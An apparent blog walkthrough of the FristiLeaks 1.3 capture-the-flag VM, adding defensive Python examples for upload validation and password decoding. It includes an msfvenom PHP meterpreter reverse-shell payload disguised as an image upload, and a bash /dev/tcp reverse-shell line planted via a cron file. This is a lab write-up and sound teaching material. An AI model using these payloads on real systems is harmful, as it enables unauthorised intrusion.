🖥️ Walkthrough / FristiLeaks: 1.3 🖥️

in #security, 7 years ago

So, on to the next one: something a touch harder this time.

<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmZLTPmGKfw6jU1oAbusV3F5cyN4e974bJSmAkq1cr5zwy/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmZLTPmGKfw6jU1oAbusV3F5cyN4e974bJSmAkq1cr5zwy/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmZLTPmGKfw6jU1oAbusV3F5cyN4e974bJSmAkq1cr5zwy/image.png 2x" /></p>
<p dir="auto"><strong>Name:</strong> FristiLeaks: 1.3<br />
<strong>Release date:</strong> 14 Dec 2015</p>
<p dir="auto"><strong>Author:</strong> Ar0xA<br />
<strong>Series:</strong> FristiLeaks<br />
<strong>Web page:</strong> <a href="https://tldr.nu/2015/12/15/fristileaks-vm/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://tldr.nu/2015/12/15/fristileaks-vm/</a><br />
<strong>Vulnhub:</strong> <a href="https://www.vulnhub.com/entry/fristileaks-13,133/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://www.vulnhub.com/entry/fristileaks-13,133/</a><br />
<strong>Description:</strong></p>
<blockquote><p dir="auto">A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.<br />
VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76</p></blockquote>
<h3>🔥 HOST DISCOVERY 🔥</h3>
<p dir="auto"><strong>ARP</strong></p>
<p dir="auto"><code>netdiscover</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmXnBLWmafjpGwBq2NcA8tX53RrGi8TZ2dFszeTSxuZqQu/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmXnBLWmafjpGwBq2NcA8tX53RrGi8TZ2dFszeTSxuZqQu/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmXnBLWmafjpGwBq2NcA8tX53RrGi8TZ2dFszeTSxuZqQu/image.png 2x" /></p>
<p dir="auto"><strong>ping</strong></p>
<p dir="auto"><code>ping 192.168.0.17</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYkws8P61yp78a2CtwBemEDnKu1DGfyT2aVbVt2Psdt7g/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYkws8P61yp78a2CtwBemEDnKu1DGfyT2aVbVt2Psdt7g/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYkws8P61yp78a2CtwBemEDnKu1DGfyT2aVbVt2Psdt7g/image.png 2x" /></p>
<h3>🔥 PORT SCANNING 🔥</h3>
<p dir="auto"><strong>TCP</strong></p>
<p dir="auto"><code>nmap -sS -A -sC -sV -O -p0- 192.168.0.17 -oA nmap_tcp_full_verOSscript</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmbkdP6j13M1LJFcqCW3MWuyMKCUMoniKNn7AdKYSqqzcA/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmbkdP6j13M1LJFcqCW3MWuyMKCUMoniKNn7AdKYSqqzcA/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmbkdP6j13M1LJFcqCW3MWuyMKCUMoniKNn7AdKYSqqzcA/image.png 2x" /></p>
<p dir="auto">Hmmm, HTTP only??</p>
<p dir="auto"><strong>UDP</strong></p>
<p dir="auto"><code>nmap -sU -n 192.168.0.17 -oA nmap_udp_def</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmb3ZNEMoFwqEieFx7Fx6dYdSD3EWv2HagHC7mFV4hEUDj/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmb3ZNEMoFwqEieFx7Fx6dYdSD3EWv2HagHC7mFV4hEUDj/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmb3ZNEMoFwqEieFx7Fx6dYdSD3EWv2HagHC7mFV4hEUDj/image.png 2x" /></p>
<p dir="auto">No UDP ports.</p>
<h3>🔥 SERVICE ENUMERATION 🔥</h3>
<p dir="auto"><strong>80 - http</strong></p>
<p dir="auto"><a href="http://192.168.0.17" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17</a></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmShK2CaSVbSyw7PMAhREuGmuKJhsafe2axu7HbcuF3M5d/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmShK2CaSVbSyw7PMAhREuGmuKJhsafe2axu7HbcuF3M5d/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmShK2CaSVbSyw7PMAhREuGmuKJhsafe2axu7HbcuF3M5d/image.png 2x" /></p>
<p dir="auto">So it looks like there is a little in robots.txt.</p>
<p dir="auto"><a href="http://192.168.0.17/robots.txt" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/robots.txt</a></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmdiTs7ek9auiagyf4QPsX8T2dthrcCPbKPsjVB61FAzTC/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmdiTs7ek9auiagyf4QPsX8T2dthrcCPbKPsjVB61FAzTC/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmdiTs7ek9auiagyf4QPsX8T2dthrcCPbKPsjVB61FAzTC/image.png 2x" /></p>
<p dir="auto"><a href="http://192.168.0.17/cola" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/cola</a><br />
<a href="http://192.168.0.17/sisi/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/sisi/</a><br />
<a href="http://192.168.0.17/beer" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/beer</a></p>
<p dir="auto">All three links appear to troll me by displaying the image below.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmX6xpCg7Fj9ojS7t6L7sDCwcjWGhp1uz6EDcGq4ELtuRs/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmX6xpCg7Fj9ojS7t6L7sDCwcjWGhp1uz6EDcGq4ELtuRs/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmX6xpCg7Fj9ojS7t6L7sDCwcjWGhp1uz6EDcGq4ELtuRs/image.png 2x" /></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/http://192.168.0.17/images/3037440.jpg" srcset="https://images.hive.blog/768x0/http://192.168.0.17/images/3037440.jpg 1x, https://images.hive.blog/1536x0/http://192.168.0.17/images/3037440.jpg 2x" /></p>
<p dir="auto"><code>nikto -h 192.168.0.17 -p 80</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmPwhJ8J6E5f2bx4ZMJ3RCFovh15PYLd6tErW8WbnmDaow/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmPwhJ8J6E5f2bx4ZMJ3RCFovh15PYLd6tErW8WbnmDaow/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmPwhJ8J6E5f2bx4ZMJ3RCFovh15PYLd6tErW8WbnmDaow/image.png 2x" /></p>
<p dir="auto"><code>dirb http://192.168.0.17</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYFhFJBA5A2hh1GBJqYc424PMGyH7g63XJoheZdgv2wXB/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYFhFJBA5A2hh1GBJqYc424PMGyH7g63XJoheZdgv2wXB/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYFhFJBA5A2hh1GBJqYc424PMGyH7g63XJoheZdgv2wXB/image.png 2x" /></p>
<p dir="auto">Hmmm. Can't drink beer. Can't drink cola. Keep calm and <strong>Fristi</strong>.</p>
<p dir="auto">There are clues right under your nose sometimes. I was stuck on this for a while.</p>
<p dir="auto"><a href="http://192.168.0.17/fristi/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">http://192.168.0.17/fristi/</a></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmero9PEb5XFmEiNGQr5M6h2GsrPF3QyaKMvFCuzLooHPV/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmero9PEb5XFmEiNGQr5M6h2GsrPF3QyaKMvFCuzLooHPV/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmero9PEb5XFmEiNGQr5M6h2GsrPF3QyaKMvFCuzLooHPV/image.png 2x" /></p>
<p dir="auto">Now we've got something: a login portal.</p>
<p dir="auto">There are a few interesting comments I spotted in the page source.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVtEgRMF8gzA8sgsw6spX527q5MEDheA6nE8xLmrGk6uV/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVtEgRMF8gzA8sgsw6spX527q5MEDheA6nE8xLmrGk6uV/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVtEgRMF8gzA8sgsw6spX527q5MEDheA6nE8xLmrGk6uV/image.png 2x" /></p>
<p dir="auto">The image source suggests the wall of characters could be a <strong>base64 encoded image</strong>.</p>
<pre><code>(html comment removed: TODO: We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz ) (html comment removed: iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg== )</code></pre>
<p dir="auto">A user found: <strong>eezeepz</strong>.</p>
<p dir="auto">In Kali we could have used the base64 tool; however, being lazy, I pulled up the first website to decode base64 ASCII:</p>
<p dir="auto"><a href="https://www.base64decode.org/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://www.base64decode.org/</a></p>
<p dir="auto">I pasted in the comment, which returned the following image.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmNZab2J71RG1qfrbvmW4TQsY3AYSfcHQE8gy4Fhp16RSp/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmNZab2J71RG1qfrbvmW4TQsY3AYSfcHQE8gy4Fhp16RSp/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmNZab2J71RG1qfrbvmW4TQsY3AYSfcHQE8gy4Fhp16RSp/image.png 2x" /></p>
<p dir="auto">Next I was able to successfully log in to the portal using:</p>
<p dir="auto">user: eezeepz<br />
password: keKkeKKeKKeKkEkkEk</p>
<p dir="auto">An upload page for us to abuse, perhaps?</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmTLyyzu8GQa6fR84h68v4MBzuWCZaPWtpXxiePMJwW9GB/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmTLyyzu8GQa6fR84h68v4MBzuWCZaPWtpXxiePMJwW9GB/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmTLyyzu8GQa6fR84h68v4MBzuWCZaPWtpXxiePMJwW9GB/image.png 2x" /></p>
<p dir="auto">The upload function is restricted to images.</p>
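Two defender-side takeaways from the base64 comment and the image-only upload form above, as an added example that is not code from the post or from the VM: decode a leaked blob offline and identify it by its PNG header instead of pasting it into a website, and validate an "images only" upload by a single allowed extension plus the content's magic bytes rather than by file name alone (the walkthrough goes on to upload a PHP payload named shell.php.png). The HTML sample and the 1x1 PNG inside it are constructed here, and the extension allow list is an assumption, not the VM's own upload rules.

```python
import base64
import re
import struct

# Constructed sample standing in for the fristi login page source: a TODO
# comment followed by a comment that is nothing but base64.  The blob is a
# 1x1 transparent PNG built for this example, not the image from the VM.
SAMPLE_HTML = """<html><body>
<!-- TODO: We need to clean this up for production. I left some junk in here. -->
<!--
iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==
-->
</body></html>"""

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# Extension -> leading bytes the content must carry.  Assumed allow list for
# this example; the VM's upload code is not on the page.
ALLOWED_IMAGE_TYPES = {
    ".png": PNG_MAGIC,
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def extract_comment_blobs(html):
    """Decode every HTML comment whose body is nothing but base64 text."""
    blobs = []
    for comment in re.findall(r"<!--(.*?)-->", html, flags=re.S):
        text = re.sub(r"\s+", "", comment)  # join wrapped lines
        if len(text) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", text):
            blobs.append(base64.b64decode(text))
    return blobs


def png_info(data):
    """Return width/height/bit depth/colour type from the IHDR chunk, or None
    if the bytes do not start with a PNG signature and a well-formed IHDR."""
    if not data.startswith(PNG_MAGIC) or len(data) < 26:
        return None
    length, chunk_type = struct.unpack(">I4s", data[8:16])
    if chunk_type != b"IHDR" or length != 13:
        return None
    width, height, bit_depth, colour_type = struct.unpack(">IIBB", data[16:26])
    return {"width": width, "height": height,
            "bit_depth": bit_depth, "colour_type": colour_type}


def upload_is_acceptable(filename, data):
    """Server-side check for an image-only upload form: the name must carry
    exactly one extension from the allow list, and the content must begin
    with that format's magic bytes.  A PHP file renamed shell.php.png fails
    the first test; a PHP file named shell.png fails the second."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False
    magic = ALLOWED_IMAGE_TYPES.get("." + parts[1])
    if magic is None:
        return False
    # The content check only proves the file starts like the claimed format;
    # the upload directory must also be served without script execution.
    return data.startswith(magic)


if __name__ == "__main__":
    for blob in extract_comment_blobs(SAMPLE_HTML):
        print("decoded %d bytes: %s" % (len(blob), png_info(blob)))
    print(upload_is_acceptable("photo.png", extract_comment_blobs(SAMPLE_HTML)[0]))
    print(upload_is_acceptable("shell.php.png", b"<?php ... ?>"))
```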
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYsWT8VcX9TbWpsAYeaNttaBVNW4UJamXxWmz7avLCxyM/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYsWT8VcX9TbWpsAYeaNttaBVNW4UJamXxWmz7avLCxyM/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYsWT8VcX9TbWpsAYeaNttaBVNW4UJamXxWmz7avLCxyM/image.png 2x" /></p>
<h3>🔥 EXPLOITATION 🔥</h3>
<p dir="auto">A quick searchsploit returns a few exploits, nothing too relevant.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmXVXqpnT5mecLXmTErjgdFVpvcsVAaEBk5A1uFsgr7ffv/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmXVXqpnT5mecLXmTErjgdFVpvcsVAaEBk5A1uFsgr7ffv/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmXVXqpnT5mecLXmTErjgdFVpvcsVAaEBk5A1uFsgr7ffv/image.png 2x" /></p>
<p dir="auto">Let's try uploading a shell instead.</p>
<p dir="auto">With the information enumerated, I build the shell with msfvenom:</p>
<p dir="auto"><code>msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.13 LPORT=4444 -f raw > shell.php.png</code></p>
<p dir="auto">Successful upload of the payload :D</p>
<p dir="auto">Before executing the payload we need to start the listener.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmV8SYxakUCs58fCHYBjNRB5BzJ7z9rXXzYMTvdSkZPjBo/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmV8SYxakUCs58fCHYBjNRB5BzJ7z9rXXzYMTvdSkZPjBo/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmV8SYxakUCs58fCHYBjNRB5BzJ7z9rXXzYMTvdSkZPjBo/image.png 2x" /></p>
<p dir="auto">Set the payload, LHOST and LPORT, then start the listener. Time to execute the payload. The browser loads indefinitely... this is a good sign.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/http://192.168.0.17/fristi/uploads/shell.php.png" srcset="https://images.hive.blog/768x0/http://192.168.0.17/fristi/uploads/shell.php.png 1x, https://images.hive.blog/1536x0/http://192.168.0.17/fristi/uploads/shell.php.png 2x" /></p>
<p dir="auto">Flick back to Metasploit and BOOM, we got a shell.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmet7h8uz4fR9aYhe3fwxfUQrtrDy1MaRxYQ6ubPtMEMoo/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmet7h8uz4fR9aYhe3fwxfUQrtrDy1MaRxYQ6ubPtMEMoo/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmet7h8uz4fR9aYhe3fwxfUQrtrDy1MaRxYQ6ubPtMEMoo/image.png 2x" /></p>
<p dir="auto">I jump into a standard shell. We are in as the <strong>apache</strong> user.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmdpsyGL671CvmWPwJE9sw2HnUPyeCeBe4CfsmVQDoYLTE/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmdpsyGL671CvmWPwJE9sw2HnUPyeCeBe4CfsmVQDoYLTE/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmdpsyGL671CvmWPwJE9sw2HnUPyeCeBe4CfsmVQDoYLTE/image.png 2x" /></p>
<h3>🔥 PRIV ESCALATION 🔥</h3>
<p dir="auto">So we now need to get root, because apache just is not good enough.</p>
<p dir="auto">First I moved into a bash shell, as backspace was annoying me.</p>
<p dir="auto"><code>/bin/bash</code></p>
<p dir="auto">This time I decided to manually go through some priv escalation commands in g0tm1lk's cheat sheet.</p>
<p dir="auto">No cheating script this time.</p>
<p dir="auto"><a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a></p>
<p dir="auto">Looking around, we start to build up info:</p>
<pre><code>admin eezeepz fristigod
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
vboxadd:x:498:1::/var/run/vboxadd:/bin/false
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin</code></pre>
<p dir="auto">Eventually, inside /home/eezeepz the <strong>notes.txt</strong> file contains some useful info.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmPV7qqjK5oVBp56Gm4z1q8X98V8jwHrxErkDLHzaySF3K/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmPV7qqjK5oVBp56Gm4z1q8X98V8jwHrxErkDLHzaySF3K/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmPV7qqjK5oVBp56Gm4z1q8X98V8jwHrxErkDLHzaySF3K/image.png 2x" /></p>
<p dir="auto">So we put the following code into the runthis file to try and get the target machine to connect back to the attacking Kali box on port 6666. This should be executed as admin also :P</p>
<p dir="auto"><code>echo "/usr/bin/dir && /bin/bash -i >& /dev/tcp/192.168.0.13/6666 0>&1" > /tmp/runthis</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmcHFEue1duCepLN8gUe5w6QAtk2Cjr8cWNEqWrxTy6JpQ/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmcHFEue1duCepLN8gUe5w6QAtk2Cjr8cWNEqWrxTy6JpQ/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmcHFEue1duCepLN8gUe5w6QAtk2Cjr8cWNEqWrxTy6JpQ/image.png 2x" /></p>
<p dir="auto">Looking in <strong>cronresult</strong>, it looks like we have a hit.</p>
<p dir="auto">Boom, we got a shell.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmbpmL23pWZ5Wza2Sv46g8nwRC6DLtKa6DqxrN3RFmxNWW/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmbpmL23pWZ5Wza2Sv46g8nwRC6DLtKa6DqxrN3RFmxNWW/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmbpmL23pWZ5Wza2Sv46g8nwRC6DLtKa6DqxrN3RFmxNWW/image.png 2x" /></p>
<p dir="auto">Now we are admin.</p>
<p dir="auto">Not good enough :( but a step up.</p>
<p dir="auto">Continuing the hunt.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmfLmHeussfeQaJykq7wpjJiuQ6tMZAmvQSyaFePDoLXCW/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmfLmHeussfeQaJykq7wpjJiuQ6tMZAmvQSyaFePDoLXCW/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmfLmHeussfeQaJykq7wpjJiuQ6tMZAmvQSyaFePDoLXCW/image.png 2x" /></p>
<p dir="auto"><strong>cryptpass.py</strong> suggests the value above is base64 encoded then ROT13 encoded.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmVqTWgcnJam7LofbBoDgFRD6EJ4ivZvuEG3Zb9tnF885e/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmVqTWgcnJam7LofbBoDgFRD6EJ4ivZvuEG3Zb9tnF885e/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmVqTWgcnJam7LofbBoDgFRD6EJ4ivZvuEG3Zb9tnF885e/image.png 2x" /></p>
<p dir="auto">After failing to get the Python code to run on the target, I jumped into Python to reverse it:</p>
<p dir="auto"><strong>LetThereBeFristi!</strong></p>
<p dir="auto">I suspected this was the password for one of the fristi users:</p>
<p dir="auto">fristigod:x:502:502::/var/fristigod:/bin/bash<br />
fristi:x:503:100::/var/www:/sbin/nologin</p>
<p dir="auto">We try to switch to <strong>fristigod</strong>.</p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmcFa6YgxGYXDavTWSSnQFxKeurPunBsm17BuLGzBPrjpr/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmcFa6YgxGYXDavTWSSnQFxKeurPunBsm17BuLGzBPrjpr/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmcFa6YgxGYXDavTWSSnQFxKeurPunBsm17BuLGzBPrjpr/image.png 2x" /></p>
<p dir="auto">Need a TTY.</p>
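The reversal the author did in Python, written out as an added example (it is neither the author's snippet nor the VM's cryptpass.py). The VM's cryptpass.py base64-encodes the password, reverses the base64 text and then applies ROT13, so decoding undoes the three steps in reverse order; every step is invertible, which is why a stored "crypted" password falls out as plaintext. The only input used is the password shown above; the encoded token in the stand-alone run is computed from it by the encoder, not copied from the VM.

```python
import base64
import codecs


def cryptpass_encode(plaintext):
    """The transformation cryptpass.py applies: base64-encode, reverse the
    base64 text, then ROT13 it.  No key is involved, so this is obfuscation,
    not encryption, and anyone who reads the script can undo it."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def cryptpass_decode_steps(token):
    """Undo the three steps in reverse order and return every intermediate
    value, which is what you want when checking a guess about the scheme:
    if the 'base64' stage is not valid base64 the guess was wrong."""
    after_rot13 = codecs.decode(token, "rot13")  # ROT13 is its own inverse
    b64 = after_rot13[::-1]                      # undo the string reversal
    plaintext = base64.b64decode(b64).decode("utf-8")
    return {"after_rot13": after_rot13, "base64": b64, "plaintext": plaintext}


def cryptpass_decode(token):
    return cryptpass_decode_steps(token)["plaintext"]


if __name__ == "__main__":
    token = cryptpass_encode("LetThereBeFristi!")  # password from the walkthrough
    print("token:", token)
    for stage, value in cryptpass_decode_steps(token).items():
        print("%-12s %s" % (stage, value))
```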
<p dir="auto">We know Python is on here, so:<br />
<a href="https://netsec.ws/?p=337" target="_blank" rel="nofollow noreferrer noopener" title="This link will take you away from hive.blog" class="external_link">https://netsec.ws/?p=337</a></p>
<p dir="auto"><code>python -c 'import pty; pty.spawn("/bin/sh")'</code></p>
<p dir="auto"><img src="https://images.hive.blog/768x0/https://steemitimages.com/DQmYWryGHPh97gAi5rJQMRStXavb6rMH9PJMw7rRFsmHWAp/image.png" srcset="https://images.hive.blog/768x0/https://steemitimages.com/DQmYWryGHPh97gAi5rJQMRStXavb6rMH9PJMw7rRFsmHWAp/image.png 1x, https://images.hive.blog/1536x0/https://steemitimages.com/DQmYWryGHPh97gAi5rJQMRStXavb6rMH9PJMw7rRFsmHWAp/image.png 2x" /></p>
<p dir="auto">Google is always helpful.</p>
<p dir="auto">So now we have successfully used the decoded string as the password for fristigod.</p>
<p dir="auto">Straight away we see an interesting folder, .secret_admin_stuff, and inside it the file <strong>doCom</strong>.</p>
